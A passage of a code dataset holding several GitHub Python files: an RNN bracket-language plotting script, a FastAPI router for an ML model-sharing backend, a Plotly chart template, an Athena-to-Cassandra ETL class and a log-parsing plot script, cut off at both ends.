plot_probs(ro, rc, eos):\n fig = plt.figure(figsize=(20, 8))\n plt.subplot(1,3,1)\n plt.hist(ro, 
bins=100)\n plt.title(\"Probabilities of round open brackets (\")\n plt.xlabel(\"Value\")\n plt.ylabel(\"Frequency\")\n\n plt.subplot(1,3,2)\n plt.hist(rc, bins=100)\n plt.title(\"Probabilities of round closed brackets )\")\n plt.xlabel(\"Value\")\n plt.ylabel(\"Frequency\")\n\n plt.subplot(1,3,3)\n plt.hist(eos, bins=100)\n plt.title(\"Probabilities of <\\s> sign\")\n plt.xlabel(\"Value\")\n plt.ylabel(\"Frequency\")\n\n fig.savefig('RNN_round_max_open_4_probs.png', bbox_inches='tight')\n #plt.show()\n\ndef main():\n print(\"Creating sentence dictionary with sentences consisting of round brackets.\")\n print(\"Maximal number of open brackets is 4, probability of an open bracket is 0.5.\")\n sent_dict = create_sent_dict(brackets, 1, [0.5,0.5], 4)\n print()\n print(\"Training data: 131,072 sentences, perplexity estimated from text: 1.4770440991905749\")\n print(\"Test data: 10,000 sentences, perplexity estimated from text: 1.4781559451539232\")\n baseline = calc_baseline_ppl(4, 0.5)\n print(\"Baseline perplexity:\", baseline)\n plot_RNN_ppl(baseline)\n print()\n print(\"Best RNN model: text size = 131,072, hidden layer size = 64, bptt = 72, number of classes = 73.\")\n print(\"Best perplexity result on test data: 1.479702.\")\n ro, rc, eos = read_prob(\"data/test.ppl.result.10000.round.4.debug.txt\")\n plot_probs(ro, rc, eos)\n \n \nif __name__ == '__main__':\n main()\n","repo_name":"NataliaSkachkova/rules_with_NN","sub_path":"Py Scripts/Max_4_open_round_brackets/max_sent_len_4_round_brackets_RNN.py","file_name":"max_sent_len_4_round_brackets_RNN.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37341496242","text":"import json\nimport os\nfrom services.user_photo_service import UserPhotoService\nimport requests\nimport aiohttp\nimport libs.format as Format\nimport libs.utilities as utilities\nimport middleware.auth as AuthMiddleware\nimport schemas.api_call as ApiCallSchema\nimport schemas.hashtag as HashtagSchema\nimport schemas.ml_model as ml_model_schema\nimport schemas.user as UserSchema\nfrom dotenv import load_dotenv\nfrom fastapi import APIRouter, Depends, Response, Request\nfrom fastapi.datastructures import UploadFile\nfrom fastapi.param_functions import File\nfrom models.prediction_request import PredictionRequest\nfrom models.result import Result\nfrom services.api_call_service import ApiCallService\nfrom services.hashtag_service import HashtagService\nfrom services.image_upload_service import ImageUploadService\nfrom services.model_cover_upload_service import ModelCoverUploadService\nfrom services.mlflow_service import MLflowService\nfrom services.model_like_service import ModelLikeService\nfrom services.user_service import UserService\nfrom services.model_comment_service import ModelCommentService\nimport util.validation as Validation\n\nload_dotenv()\nPREDICTION_SERVER = os.getenv('PREDICTION_SERVER')\nPREDICTION_SERVER_PORT = os.getenv('PREDICTION_SERVER_PORT')\n\naiohttp_session = aiohttp.ClientSession()\n\nrouter = APIRouter()\n\n\n# Get models\n@router.get('/models', status_code=200)\nasync def get_models(request: Request,\n response: Response,\n search_query: str = '',\n order: str = 'recent',\n page_number: int = 1, results_per_page: int = 10):\n accepted_orders = ['recent', 'popular', 'recently_used']\n results = []\n\n query_results_data = []\n\n # Check if order param exists and if it's accepted\n if order != '' and order not in accepted_orders:\n result = 
Result(\n Result.FAIL,\n 'Order parameter is not valid',\n Result.BAD_REQUEST\n )\n\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n # Get models by order param\n if order == 'recent':\n # Get most recent models\n query_results = MLflowService.search_models(model_name=search_query,\n page_number=page_number,\n results_per_page=results_per_page)\n query_results_data = query_results.data\n\n elif order == 'popular':\n # Get most popular models\n query_results = ApiCallService.get_most_popular_models(search_query=search_query,\n page_number=page_number,\n results_per_page=results_per_page)\n\n query_results_data = query_results.data['models']\n\n elif order == 'recently_used':\n user_id = None\n # Check if authorization header exists\n if 'Authorization' in request.headers:\n # Get current user\n current_user = await AuthMiddleware.get_current_user(\n str(request.headers['Authorization']).replace('Bearer ', ''))\n user_id = current_user.data.id\n\n # Get recently used models\n query_results = ApiCallService.get_recently_used_models(user_id=user_id,\n search_query=search_query,\n page_number=page_number,\n results_per_page=results_per_page)\n query_results_data = query_results.data[\"models\"]\n\n else:\n query_results = Result(\n Result.FAIL,\n 'Order parameter is not valid',\n Result.NOT_ACCEPTABLE\n )\n\n # Return error\n if query_results.is_fail():\n response.status_code = query_results.get_status_code()\n return query_results.to_dict()\n\n for registered_model in query_results_data:\n\n # Validation is necessary because model_version from recently used is already formatted\n if order != 'recently_used':\n # Get user\n user = UserService.get_user_by_username(registered_model.tags['user_id'])\n if user.is_success():\n user = ml_model_schema.User(name=user.data.name, username=user.data.username)\n\n try:\n user.photo = UserPhotoService.get_user_photo(user.username)\n except:\n user.photo = None\n\n # Get hashtags\n hashtags_result = HashtagService.get_model_hashtags(model_name=registered_model.name)\n hashtags = hashtags_result.data if hashtags_result.is_success() else []\n print(\"[DEBUG] hashtags_result.is_success():\", hashtags_result.is_success())\n\n # Get API calls\n api_calls_result = ApiCallService.get_model_count(model_name=registered_model.name)\n api_calls = api_calls_result.data['count'] if api_calls_result.is_success() else 0\n print(\"[DEBUG] api_calls_result.is_success():\", api_calls_result.is_success())\n\n # Get likes\n user_id = None\n\n # Check if authorization header exists\n if 'Authorization' in request.headers:\n # Get current user\n current_user = await AuthMiddleware.get_current_user(\n str(request.headers['Authorization']).replace('Bearer ', ''))\n user_id = current_user.data.id\n\n likes_dict = {\n 'count': 0,\n 'has_liked_model': False\n }\n\n likes_dict['count'] = ModelLikeService.get_model_likes(model_name=registered_model.name,\n count_only=True).data\n likes_dict['has_liked_model'] = False\n\n # Check if user liked model\n if user_id:\n user_like = ModelLikeService.get_like(model_name=registered_model.name, user_id=user_id)\n\n if user_like.is_success() and user_like.data is not None:\n likes_dict['has_liked_model'] = True\n\n likes = ml_model_schema.Likes(**likes_dict)\n\n # Get comment count\n comment_count = ModelCommentService.get_model_comments(model_name=registered_model.name, count_only=True)\n comment_count = comment_count.data if comment_count.is_success() else 0\n\n # Get latest model version\n version = 0 if 
len(registered_model.latest_versions) == 0 else int(registered_model.latest_versions[0].version)\n\n # Get model's cover photo\n cover_photo = None\n try:\n cover_photo = ModelCoverUploadService.get_model_cover_photo(registered_model.name)\n except:\n cover_photo = None\n\n registered_model_dict = ml_model_schema.MlModelListing(name=registered_model.name,\n version=version,\n likes=likes,\n comment_count=comment_count,\n hashtags=hashtags,\n tags=registered_model.tags,\n api_calls=api_calls,\n creation_time=registered_model.creation_timestamp,\n last_update_time=registered_model.last_updated_timestamp,\n user=user,\n description=registered_model.description,\n cover_photo=cover_photo).dict()\n results.append(registered_model_dict)\n\n # Sorting here is necessary since it won't work when doing it with SQL, because SQL query is guaranteeing\n # that only the latest version of each model is being returned, by sorting by model name and version\n if order == 'recent':\n results = sorted(results, key=lambda x: x['creation_time'], reverse=True)\n\n return Result(\n Result.SUCCESS,\n 'Collected models successfully',\n results\n ).to_dict()\n\n\n# Get model\n@router.get('/models/{model_name}')\ndef get_model(model_name: str, response: Response, type: str = 'full'):\n # Get model version\n\n result = MLflowService.get_model(model_name)\n\n if result.is_success():\n # Format model version\n # if model_version == 0 => no deployment\n model_version = 0 if len(result.data.latest_versions) == 0 else int(result.data.latest_versions[0].version)\n\n username = result.data.tags[\"user_id\"]\n\n # Get user\n user = UserService.get_user_by_username(username)\n\n if user.is_success():\n user = ml_model_schema.User(name=user.data.name, username=user.data.username)\n\n # Get hashtags\n hashtags_result = HashtagService.get_model_hashtags(model_name=model_name)\n hashtags = hashtags_result.data if hashtags_result.is_success() else []\n print(\"[DEBUG] hashtags_result.is_success():\", hashtags_result.is_success())\n\n # Get github repo\n github_repo = result.data.tags.get(\"github_repo\")\n github_repo_files_url = Validation.get_github_raw_files_url(url = github_repo) if github_repo else None\n github_repo_readme_url = Validation.get_github_readme_url(url = github_repo) if github_repo else None\n\n # Get api calls\n api_calls_result = ApiCallService.get_model_count(model_name=model_name)\n api_calls = api_calls_result.data['count'] if api_calls_result.is_success() else 0\n print(f\"[DEBUG] api_calls_result.is_success():\", api_calls_result.is_success())\n\n # Get signature & input example\n if model_version == 0:\n signature = result.data.tags.get(\"signature\")\n input_example = result.data.tags.get(\"input_example\")\n else:\n signature_result = MLflowService.get_model_signature(model_name, model_version, result.data.latest_versions[0])\n signature = signature_result.data if signature_result.is_success() else None\n\n input_example_result = MLflowService.get_input_example(model_name, model_version, result.data.latest_versions[0])\n input_example = input_example_result.data if input_example_result.is_success() else None\n\n print(f\"[DEBUG] signature_result.is_success():\", signature_result.is_success())\n print(f\"[DEBUG] input_example_result.is_success():\", input_example_result.is_success())\n\n\n # TODO get metrics from model version\n metrics = json.loads(result.data.tags.get(\"metrics\")) if result.data.tags.get(\"metrics\") else None\n # TODO get parameters from model version\n parameters = 
json.loads(result.data.tags.get(\"params\")) if result.data.tags.get(\"params\") else None\n\n likes_dict = {\n 'count': 0,\n 'has_liked_model': False\n }\n\n model_likes_result = ModelLikeService.get_model_likes(model_name=model_name,\n count_only=True)\n likes_dict['count'] = model_likes_result.data if model_likes_result.is_success() else 0\n likes_dict['has_liked_model'] = False\n\n # Check if user liked model\n # ...\n\n likes = ml_model_schema.Likes(**likes_dict)\n\n # Get comment count\n comment_count = ModelCommentService.get_model_comments(model_name=model_name, count_only=True)\n comment_count = comment_count.data if comment_count.is_success() else 0\n\n # Get GitHub repo's README.md\n raw_readme = None\n if github_repo_readme_url:\n try:\n raw_readme = requests.get(f'https://{github_repo_readme_url}').text\n except:\n raw_readme = None\n\n # Get model's cover photo\n cover_photo = None\n try:\n cover_photo = ModelCoverUploadService.get_model_cover_photo(model_name)\n except:\n cover_photo = None\n\n # Set Result's data property\n result.data = ml_model_schema.MlModelPage(name=model_name,\n version=model_version,\n metrics=metrics,\n parameters=parameters,\n tags=result.data.tags,\n likes=likes,\n comment_count=comment_count,\n signature=signature,\n input_example=input_example,\n api_calls=api_calls,\n creation_time=result.data.creation_timestamp,\n last_update_time=result.data.last_updated_timestamp,\n description=result.data.description,\n user=user,\n hashtags=hashtags,\n github_repo=github_repo,\n github_repo_files_url=github_repo_files_url,\n github_repo_readme_url=github_repo_readme_url,\n model_card=raw_readme,\n cover_photo=cover_photo).dict()\n\n else:\n response.status_code = result.get_status_code()\n\n # Return response\n return result.to_dict()\n\n\n# Update model version\n@router.post('/models/create', status_code=200)\ndef create_model(response: Response,\n model: ml_model_schema.MlModelCreate,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n result = MLflowService.create_registered_model(current_user.data.username, model.name, description=model.description)\n\n invalid_result = Result(\n Result.FAIL,\n '#key# invalid. Please enter a valid JSON object.',\n Result.NOT_ACCEPTABLE\n )\n has_error: bool = False\n\n if result.is_success():\n # Validate model's data\n if model.metrics is not None and not Validation.is_valid_json(model.metrics):\n # Metrics\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Metrics are')\n elif model.parameters is not None and not Validation.is_valid_json(model.parameters):\n # Parameters\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Parameters are')\n elif model.input_example is not None and not Validation.is_valid_json(model.input_example):\n # Input example\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Input example is')\n elif model.signature is not None and not Validation.is_valid_json(model.signature):\n # Signature\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Signature is')\n elif model.github_repo is not None and not Validation.is_github_repo_valid(model.github_repo):\n # GitHub repository\n has_error = True\n invalid_result.message = 'GitHub repository URL is invalid. 
URL should look something like: github.com/github_username/github_project'\n\n if has_error:\n response.status_code = invalid_result.get_status_code()\n return invalid_result.to_dict()\n \n if model.metrics:\n _ = MLflowService.set_metrics(current_user.data.username, model_name=model.name, metrics=model.metrics)\n if model.parameters:\n _ = MLflowService.set_params(current_user.data.username, model_name=model.name, params=model.parameters)\n if model.github_repo:\n _ = MLflowService.set_github_repo(current_user.data.username, model_name=model.name, url=model.github_repo)\n if model.input_example:\n _ = MLflowService.set_input_example(current_user.data.username, model_name=model.name, input_example=model.input_example)\n if model.signature:\n _ = MLflowService.set_signature(current_user.data.username, model_name=model.name, signature=model.signature)\n else:\n response.status_code = result.get_status_code()\n\n return result.to_dict()\n\n\n@router.post('/models/metrics/{model_name}', status_code=200)\ndef set_model_metrics(model_name: str,\n metrics: ml_model_schema.MlModelMetricsSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model metrics\"\"\"\n result = MLflowService.set_metrics(current_user.data.username, model_name, metrics=metrics.metrics)\n\n return result.to_dict()\n\n\n@router.post('/models/github-repo/{model_name}', status_code=200)\ndef set_github_repo(model_name: str,\n url: ml_model_schema.MlModelGitHubSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model github repo\"\"\"\n result = MLflowService.set_github_repo(current_user.data.username, model_name, url=url.url)\n\n return result.to_dict()\n\n\n@router.post('/models/parameters/{model_name}', status_code=200)\ndef set_model_parameters(model_name: str,\n parameters: ml_model_schema.MlModelParametersSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model parameters\"\"\"\n result = MLflowService.set_params(current_user.data.username, model_name, parameters=parameters.parameters)\n\n return result.to_dict()\n\n@router.post('/models/input_example/{model_name}', status_code=200)\ndef set_model_input_example(model_name: str,\n input_example: ml_model_schema.MlModelInputExampleSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model input example\"\"\"\n result = MLflowService.set_input_example(current_user.data.username, model_name, input_example=input_example.input_example)\n\n return result.to_dict()\n\n@router.post('/models/signature/{model_name}', status_code=200)\ndef set_model_signature(model_name: str,\n signature: ml_model_schema.MlModelSignatureSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model signature\"\"\"\n result = MLflowService.set_signature(current_user.data.username, model_name, signature=signature.signature)\n\n return result.to_dict()\n\n\n# Update model version\n@router.put('/models/{model_name}', status_code=200)\ndef update_model(model_name: str,\n edit_values: ml_model_schema.MlModelEdit,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Update model\n\n Example cURL:\n curl -X PUT \"http://localhost:8000/api/v0/models/ElasticNet\" -H 'Authorization: Bearer ' \\\n -H \"accept: application/json\" 
-H \"Content-Type: application/json\" \\\n -d \"{\\\"name\\\":\\\"\\\",\\\"description\\\":\\\"Some description\\\"}\"\n \"\"\"\n\n # Update model\n updated_model_result = MLflowService.update_model_description(model_name=model_name,\n username=current_user.data.username,\n description=edit_values.description)\n\n if updated_model_result.is_fail():\n response.status_code = updated_model_result.get_status_code()\n\n invalid_result = Result(\n Result.FAIL,\n '#key# invalid. Please enter a valid JSON object.',\n Result.NOT_ACCEPTABLE\n )\n has_error: bool = False\n\n # Validate model's data\n if edit_values.metrics is not None and not Validation.is_valid_json(edit_values.metrics):\n # Metrics\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Metrics are')\n elif edit_values.parameters is not None and not Validation.is_valid_json(edit_values.parameters):\n # Parameters\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Parameters are')\n elif edit_values.input_example is not None and not Validation.is_valid_json(edit_values.input_example):\n # Input example\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Input example is')\n elif edit_values.signature is not None and not Validation.is_valid_json(edit_values.signature):\n # Signature\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Signature is')\n elif edit_values.github_repo is not None and not Validation.is_github_repo_valid(edit_values.github_repo):\n # GitHub repository\n has_error = True\n invalid_result.message = 'GitHub repository URL is invalid. URL should look something like: github.com/github_username/github_project'\n\n if has_error:\n response.status_code = invalid_result.get_status_code()\n return invalid_result.to_dict()\n\n MLflowService.set_metrics(current_user.data.username, model_name=model_name, metrics=edit_values.metrics) if edit_values.metrics else MLflowService.delete_metrics(current_user.data.username, model_name)\n MLflowService.set_params(current_user.data.username, model_name=model_name, params=edit_values.parameters) if edit_values.parameters else MLflowService.delete_params(current_user.data.username, model_name)\n MLflowService.set_github_repo(current_user.data.username, model_name=model_name, url=edit_values.github_repo) if edit_values.github_repo else MLflowService.delete_github_repo(current_user.data.username, model_name)\n MLflowService.set_input_example(current_user.data.username, model_name=model_name, input_example=edit_values.input_example) if edit_values.input_example else MLflowService.delete_input_example(current_user.data.username, model_name)\n MLflowService.set_signature(current_user.data.username, model_name=model_name, signature=edit_values.signature) if edit_values.signature else MLflowService.delete_signature(current_user.data.username, model_name)\n\n return updated_model_result.to_dict()\n\n\n# Delete model version\n@router.delete('/models/{model_name}', status_code=200)\ndef delete_model_version(model_name: str, model_version: int, response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Delete model version\n \"\"\"\n result = MLflowService.delete_model_version(username=current_user.data.username,\n model_name=model_name,\n model_version=model_version)\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n\n return 
result.to_dict()\n\n\n@router.post('/models/{model_name}/hashtags', status_code=200)\ndef add_model_hashtag(model_name: str,\n hashtag: HashtagSchema.HashtagUpdateBase,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n '''\n Create model hashtag\n '''\n\n result = HashtagService.add_model_hashtag(model_name=model_name, value=hashtag.value, key=hashtag.key)\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n\n return result.to_dict()\n\n\n@router.delete('/models/{model_name}/hashtags/{hashtag_id}', status_code=200)\ndef delete_model_hashtag(model_name: str,\n hashtag_id: int,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n '''\n Deletes model hashtag\n '''\n\n result = HashtagService.delete_model_hashtag(model_name=model_name, hashtag_id=hashtag_id)\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n\n return result.to_dict()\n\n\n@router.post('/predict/{model_name}')\nasync def predict(model_name: str,\n prediction_req: PredictionRequest,\n response: Response,\n current_user=Depends(AuthMiddleware.get_current_user)):\n '''Make prediction using model\n\n Request example: \n curl -X POST \"http://localhost:8000/api/v0/predict/ElasticNet\" \\\n -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJibGMiLCJleHAiOjE2MjY4MTY0MTl9.5LhKKL2gyxrGgF2XHo2QjMcLCQ2ptwRtNOqcPp-qdLk' \\\n -H 'accept: application/json' \\\n -d '{\"columns\": [\"fixed acidity\",\"volatile acidity\",\"citric acid\",\"residual sugar\",\"chlorides\",\"free sulfur dioxide\",\"total sulfur dioxide\",\"density\",\"pH\",\"sulphates\",\"alcohol\"], \"index\": [0, 1], \"data\": [[7,0.27,0.36,20.7,0.045,45,170,1.001,3,0.45,8.8], [7,0.27,0.36,20.7,0.045,45,170,1.001,3,0.45,8.8]]}'\n '''\n prediction_json = json.loads(prediction_req.json())\n batch_size = len(prediction_json['data'])\n\n if batch_size > 10:\n result = Result(\n Result.FAIL,\n 'Failed to perform prediction. Batch size is too big!',\n Result.NOT_ACCEPTABLE\n )\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n # Get model\n registered_model_result = MLflowService.get_model(model_name=model_name)\n if registered_model_result.is_fail() or len(registered_model_result.data.latest_versions) == 0:\n return Result(Result.SUCCESS,\n f\"Failed to get deployment endpoint for model with name '{model_name}'. 
{registered_model_result}\",\n Result.NOT_FOUND)\n model_version = registered_model_result.data.latest_versions[0].version\n\n # Predict\n # NOTE this is horrible; reuse token (don't know how...)\n access_token, _ = AuthMiddleware.create_access_token(data={'sub': current_user.data.username},\n expires_delta=int(os.getenv('ACCESS_TOKEN_EXPIRATION')))\n try:\n async with aiohttp_session.post(\n f'http://{PREDICTION_SERVER}:{PREDICTION_SERVER_PORT}/api/v0/serving/predict/{model_name}/{model_version}',\n headers={'Authorization': f'Bearer {access_token}'},\n json=prediction_json) as resp:\n predict_result = await resp.text()\n print(f'[DEBUG] predict_result: {predict_result}')\n\n result = json.loads(predict_result)\n\n # Log api call\n if result['status'] == Result.SUCCESS:\n api_call_create = ApiCallSchema.ApiCallCreate(user_id=current_user.data.id, model_name=model_name,\n model_version=model_version)\n api_calls = ApiCallService.create_batch(api_call_create, batch_size)\n\n if api_calls.is_fail():\n response.status_code = api_calls.get_status_code()\n return api_calls.to_dict()\n\n return result\n else:\n result_fail = Result(\n Result.FAIL,\n f'Could not perform prediction using model ({model_name}, {model_version}). An unexpected error occured.',\n Result.EXCEPTION\n )\n response.status_code = result_fail.get_status_code()\n return result_fail.to_dict()\n\n except Exception as e:\n print(f'[EXCEPTION] Could not perform prediction using model ({model_name}, {model_version}). Exception: {e}')\n result_fail = Result(Result.FAIL,\n f'Could not perform prediction using model ({model_name}, {model_version}). An unexpected error occured.',\n Result.EXCEPTION)\n response.status_code = result_fail.get_status_code()\n\n return result_fail.to_dict()\n\n\n# Get model version usage\n@router.get('/models/{model_name}/usage')\nasync def get_model_usage(model_name: str, response: Response, sample: str = 'D'):\n ''' Get total and sampled API calls for model version - sample is a query param\n \n :param model_name: the name of the model\n :param model_version: the version of the model\n :param sample: the the sample to which to sample count\n\n :return: a json object with total and sampled api calls \n Example:\n Get usage by 1 minute interval\n curl http:/localhost:8000/api/v0/model_usage/ElasticNet/1/?sample=1Min\n '''\n sampled_count = ApiCallService.count_by(model_name, sample=sample)\n\n if sampled_count.is_fail():\n response.status_code = sampled_count.get_status_code()\n return sampled_count.to_dict()\n\n total_count = 0\n sampled_count_json = json.loads(sampled_count.data['sampled_count'])\n for k in sampled_count_json:\n total_count += sampled_count_json[k]\n\n results = {'count': total_count,\n 'sampled_count': sampled_count.data['sampled_count'],\n 'distinct_users_count': sampled_count.data['distinct_users_count']}\n\n return Result(\n Result.SUCCESS,\n 'Successfully fetched model usage',\n results\n ).to_dict()\n\n\n# Get model versions\n@router.get('/versions/{model_name}', status_code=200)\ndef get_model_versions(model_name: str, response: Response):\n result = MLflowService.list_model_versions(model_name=model_name)\n model_versions = []\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n for model_version in result.data:\n model_versions.append(Format.format_model_version(model_version))\n\n result.data = model_versions\n\n return result.to_dict()\n\n# Upload cover photo\n@router.post('/models/{model_name}/cover', status_code=200)\ndef 
upload_cover_photo(model_name: str, response: Response, cover_photo: UploadFile = File(...)):\n # Get cover photo's path\n full_cover_photo_path = ModelCoverUploadService.get_model_cover_photo_path(model_name)\n\n # Check if file extension is valid\n if not ImageUploadService.is_valid_extension(content_type=cover_photo.content_type):\n result = Result(\n Result.FAIL,\n 'Invalid file extension',\n Result.NOT_ACCEPTABLE\n )\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n # Check if model exists\n model = MLflowService.get_model(model_name=model_name)\n\n if model.is_fail():\n response.status_code = model.get_status_code()\n return model.to_dict()\n\n # Save cover photo\n try:\n utilities.clear_dir(full_cover_photo_path)\n utilities.create_dir(full_cover_photo_path)\n utilities.save_uploaded_file(full_cover_photo_path, cover_photo)\n except Exception:\n result = Result(\n Result.FAIL,\n 'An error occurred while saving cover photo',\n Result.EXCEPTION\n )\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n return Result(\n Result.SUCCESS,\n 'Successfully saved cover photo'\n ).to_dict()\n","repo_name":"shippedbrain/shipped-brain-backend","sub_path":"api/src/routers/ml_models.py","file_name":"ml_models.py","file_ext":"py","file_size_in_byte":32093,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"33471336830","text":"class CovidFormat:\n\n    # Template for plot visuals\n    covid_template = dict(\n        font=dict(\n            #family=\"Courier New, monospace\",\n            size=15,\n            color=\"Black\"\n        ),\n        height=600,\n        width=900,\n\n    )\n\n    # Template for handling slider functionality for plots and providing buttons to alter time-period range of data\n    slider_template = dict(\n        rangeselector=dict(\n            buttons=list([\n                dict(count=7.5,\n                     label=\"Weekly\",\n                     step=\"day\",\n                     stepmode=\"todate\"),\n                dict(count=14,\n                     label=\"Biweekly\",\n                     step=\"day\",\n                     stepmode=\"backward\"),\n                dict(count=1,\n                     label=\"Monthly\",\n                     step=\"month\",\n                     stepmode=\"backward\"),\n                dict(count=1,\n                     label=\"Yearly\",\n                     step=\"year\",\n                     stepmode=\"todate\"),\n                dict(label=\"All\",step=\"all\")\n            ])\n        ),\n        rangeslider=dict(\n            visible=True\n        ),\n        type=\"date\"\n    )\n\n","repo_name":"MatthewBailey97/Georgia_Covid","sub_path":"formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34459989844","text":"\"\"\"\nhandle ETL of data from Athena to Cassandra\n\"\"\"\nfrom typing import Optional, List\nfrom dataclasses import dataclass\n\nfrom hip_data_tools.apache.cassandra import CassandraConnectionSettings\nfrom hip_data_tools.aws.athena import AthenaUtil\nfrom hip_data_tools.aws.common import AwsConnectionSettings, AwsConnectionManager\nfrom hip_data_tools.etl.s3_to_cassandra import S3ToCassandraSettings, S3ToCassandra\n\n\n@dataclass\nclass AthenaToCassandraSettings:\n    \"\"\"Athena to Cassandra ETL settings\"\"\"\n    source_database: str\n    source_table: str\n    source_connection_settings: AwsConnectionSettings\n    destination_keyspace: str\n    destination_table: str\n    destination_table_primary_keys: List[str]\n    destination_table_partition_key: Optional[List[str]]\n    destination_connection_settings: CassandraConnectionSettings\n    destination_table_options_statement: str = \"\"\n    destination_batch_size: int = 1\n\n\nclass AthenaToCassandra(S3ToCassandra):\n    \"\"\"\n    Class to transfer parquet data from s3 to Cassandra\n    
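Reads the source table's S3 data location from Athena, then delegates the transfer to S3ToCassandra.\n    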
Args:\n settings (AthenaToCassandraSettings): the settings around the etl to be executed\n \"\"\"\n\n def __init__(self, settings: AthenaToCassandraSettings):\n self.__settings = settings\n self._athena = AthenaUtil(\n database=self.__settings.source_database,\n conn=AwsConnectionManager(self.__settings.source_connection_settings))\n (bucket, key) = self._athena.get_table_data_location(self.__settings.source_table)\n super().__init__(S3ToCassandraSettings(\n source_bucket=bucket,\n source_key_prefix=key,\n source_connection_settings=self.__settings.source_connection_settings,\n destination_keyspace=self.__settings.destination_keyspace,\n destination_table=self.__settings.destination_table,\n destination_table_primary_keys=self.__settings.destination_table_primary_keys,\n destination_table_partition_key=self.__settings.destination_table_partition_key,\n destination_table_options_statement=self.__settings.destination_table_options_statement,\n destination_batch_size=self.__settings.destination_batch_size,\n destination_connection_settings=self.__settings.destination_connection_settings,\n ))\n","repo_name":"hipagesgroup/data-tools","sub_path":"hip_data_tools/etl/athena_to_cassandra.py","file_name":"athena_to_cassandra.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"27928056617","text":"import os, re, sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.style.use(\"ggplot\")\nplt.rcParams[\"font.size\"] = 12\nplt.rcParams['text.latex.preamble']=[r\"\\usepackage{amsmath}\"]\n\ndatasets = [\"amazon-photo\", \"pubmed\", \"amazon-computers\", \"coauthor-physics\", \"flickr\"]\n# datasets = [\"amazon-computers\"]\nmodes = [\"cluster\", \"graphsage\"]\nalgs = [\"gcn\", \"ggnn\", \"gat\", \"gaan\"]\n# algs = [\"gat\"]\n\ncluster_batchs = [15, 45, 90, 150, 375, 750]\n\ngraphsage_batchs = {\n 'amazon-photo': [77, 230, 459, 765, 1913, 3825],\n 'pubmed': [198, 592, 1184, 1972, 4930, 9859],\n 'amazon-computers': [138, 413, 826, 1376, 3438, 6876],\n 'coauthor-physics': [345, 1035, 2070, 3450, 8624, 17247],\n 'flickr': [893, 2678, 5355, 8925, 22313, 44625]\n}\n\nxticklabels = ['1%', '3%', '6%', '10%', '25%', '50%', 'FULL']\n\ndir_in = \"log_fix_epoch\"\ndir_out = \"res_fix_epoch\"\n\nfor data in datasets:\n if not os.path.exists(dir_out + \"/\" + data):\n os.makedirs(dir_out + \"/\" + data)\n \n\"\"\"\nGoal: plot how accuracy changes with the number of batches under different batch sizes\n\nData collected:\nalgorithm, sampling method, dataset, time/acc\n\nPlots:\nalgorithm + sampling method + time/acc\ndf.index: the x-axis of the figure\ndf.columns: the different lines in the figure (the different batch sizes)\n\"\"\"\nfor data in datasets:\n for alg in algs:\n for mode in modes:\n print(data, alg, mode)\n flag = False\n # Store the data into a csv file\n df_times, df_accs = {}, {}\n if mode == \"cluster\":\n for i, cs in enumerate(cluster_batchs):\n file_path = os.path.join(dir_in, '_'.join([mode, alg, data, str(cs)]) + \".log\")\n if not os.path.exists(file_path):\n flag = True\n break\n df_times[xticklabels[i]], df_accs[xticklabels[i]] = [], []\n # Read the log file to get bs_times, bs_accs: dims=100\n with open(file_path) as f:\n for line in f:\n match_line = re.match(r\"Batch:.*best_test_acc: (.*), cur_use_time: (.*)s\", line)\n if match_line:\n df_accs[xticklabels[i]].append(float(match_line.group(1)))\n df_times[xticklabels[i]].append(float(match_line.group(2)))\n if len(df_times[xticklabels[i]]) != 100:\n flag = True\n break \n elif mode == \"graphsage\":\n for i, gs in enumerate(graphsage_batchs[data]):\n file_path = os.path.join(dir_in, '_'.join([mode, 
